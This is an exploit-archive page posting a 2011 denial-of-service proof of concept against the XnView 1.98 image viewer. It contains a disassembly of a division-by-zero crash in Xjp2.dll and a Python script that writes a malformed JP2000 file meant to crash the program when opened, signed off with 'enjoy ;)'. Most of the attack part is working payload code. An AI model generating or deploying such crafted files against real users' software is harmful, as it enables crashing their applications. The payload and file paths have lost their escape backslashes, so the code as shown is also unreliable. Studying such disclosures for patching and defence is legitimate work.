Home / exploitsPDF  

XnView 1.98 Denial Of Service Proof Of Concept

Posted on 20 June 2011

# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe    MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll      MD5: 0c831c090f5a723d44bb641b175ca0e6

# DoS is caused by integer division by zero in module Xjp2.dll

# It can be triggered from:
# Local: C:XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \MySecretServerXnView 1.98 JP2000 (Compression 50%) DoS.jp2

# 1000D1C4    8A44BA 03       MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8    8941 E4         MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB    8B56 0C         MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE    8D4413 FF       LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2    33D2            XOR EDX,EDX
# 1000D1D4    F7F3            DIV EBX                                  ; div by zero
# 1000D1D6    33D2            XOR EDX,EDX
# 1000D1D8    8BE8            MOV EBP,EAX
# 1000D1DA    8B46 04         MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD    8D4403 FF       LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1    F7F3            DIV EBX
# 1000D1E3    8B59 E4         MOV EBX,DWORD PTR DS:[ECX-1C]

filepath = "C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
f = open(filepath, "wb")
poc = 'x00x00x00x0Cx6Ax50x20x20x0Dx0Ax87x0Ax00x00x00x14x66x74x79x70x6Ax70x32x20x00x00x00x00x6Ax70x32x20x00x00x00x2Dx6Ax70x32x68x00x00x00x16x69x68x64x72x00x00x00x0Dx00x00x00x0Bx00x03x07x07x00x00x00x00x00x0Fx63x6Fx6Cx72x01x00x00x00x00x00x10x00x00x00x00x6Ax70x32x63xFFx4FxFFx51x00x2Fx00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x03x07x00x00x07x01x01x07x01x01xFFx5Cx00x17x42x60xC8x42x5Dx42x5Dx42x6Dx3AxDBx3AxDBx3Bx35x32xB8x32xB8x32x6BxFFx5Dx00x18x01x42x60x6Dx41xF2x41xF2x42x01x3Ax6Bx3Ax6Bx3AxC1x32x49x32x49x31xFFxFFx5Dx00x18x02x42x61xAAx43x69x43x69x43x7Ax3BxF3x3BxF3x3Cx56x33xCCx33xCCx33x78xFFx52x00x0Cx00x00x00x01x01x03x04x04x00x00xFFx64x00x0Fx00x01x4Cx57x46x5Fx4Ax50x32x5Fx32x30x37xFFx90x00x0Ax00x00x00x00x00xA7x00x01xFFx93xC7xECx0Cx08x8AxC1xC5xD6x54xC0x7Dx40xA0x0BxBFx3Bx6FxDFxC1xF8x02x80x03x97x3Dx32x8BxC0xF8x42x87xCEx12x07xC2x10x01x7Fx0Cx31x03x6Bx0BxE3xA0x10x80x01xC0x74x18x1Fx08x60x04x0Cx41x6FxC3xE4x13x07xC2x34x1Fx08x80x1CxDDxFDx75xB0xA9x74x39x3Fx0Dx31x97xD9xD9x7Fx0CxACxCDx9FxC0xE8x60x1Fx92xE7xC0xE8xB0x3Ax1Cx04x40x1Fx1ExA0x20x67x12x9Ax3Fx0CxA7xC3xE1x2Ax0Ex93x07x45x61x1Cx5ExC3xDDxACx1BxF5x5BxB9x03x8AxADxF5x07x1Fx86x1Dx5Fx19xD8x05x13xA3xC0x84x5FxC0x8Ax04x80x01x7Fx03x9Cx46xBFxFFxD9'
f.write(poc)
f.close()

print "Done, 1 file generated on 'C:\' ..."
print "Open this file in XnView 1.98 and enjoy ;)"

 

TOP

Malware :

Exploits :